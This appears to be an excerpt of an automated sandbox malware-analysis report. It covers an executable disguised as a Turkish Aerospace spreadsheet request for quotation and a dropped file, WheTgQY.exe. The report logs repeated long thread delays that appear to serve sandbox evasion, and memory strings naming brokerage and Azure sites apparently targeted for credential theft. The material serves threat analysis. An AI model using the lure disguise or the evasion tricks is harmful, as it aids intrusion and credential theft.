                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -595042s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -594922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -594812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -594703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316Thread sleep time: -594594s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep count: 33 > 30
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -30437127721620741s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -599890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7484Thread sleep count: 8332 > 30
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7484Thread sleep count: 1526 > 30
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -599773s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -599671s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -599562s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -599453s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -599343s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -599231s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -599125s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -599015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -598903s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -598797s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -598687s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -598576s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -598468s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -598359s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -598250s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -598140s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -598031s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -597922s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -597812s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -597703s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -597593s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -597484s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -597375s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -597265s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -597156s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -597047s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -596937s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -596822s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -596718s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -596609s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -596491s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -596346s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -596218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -596108s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -595997s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -595890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -595781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -595671s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -595562s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -595453s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -595343s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -595234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -595125s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -595015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -594906s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -594797s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -594687s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480Thread sleep time: -594578s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 240000Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239883Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239765Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239651Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239546Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239435Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239328Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239219Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239109Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 239000Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 238883Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 238688Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 238463Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 238156Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 237989Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 237859Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 237664Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 240000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 239812Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 239702Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 239589Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 239469Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 239360Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 239247Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 239137Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 238992Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 238504Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 238384Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 238278Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 238170Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 238047Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 237935Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599560Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598891Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598672Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597465Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597344Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 597015Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596575Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596250Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 596030Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595922Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595812Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595594Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595484Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595265Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 595042Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 594922Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 594812Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599890
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599773
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599671
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599562
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599453
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599343
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599231
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599125
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 599015
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598903
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598797
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598687
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598576
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598468
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598359
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598250
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598140
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 598031
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597922
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597812
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597703
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597593
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597484
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597375
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597265
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597156
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 597047
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596937
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596822
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596718
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596609
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596491
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596346
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596218
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 596108
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595997
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595890
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595781
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595671
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595562
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595453
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595343
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595234
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595125
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 595015
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 594906
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 594797
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 594687
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeThread delayed: delay time: 594578
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
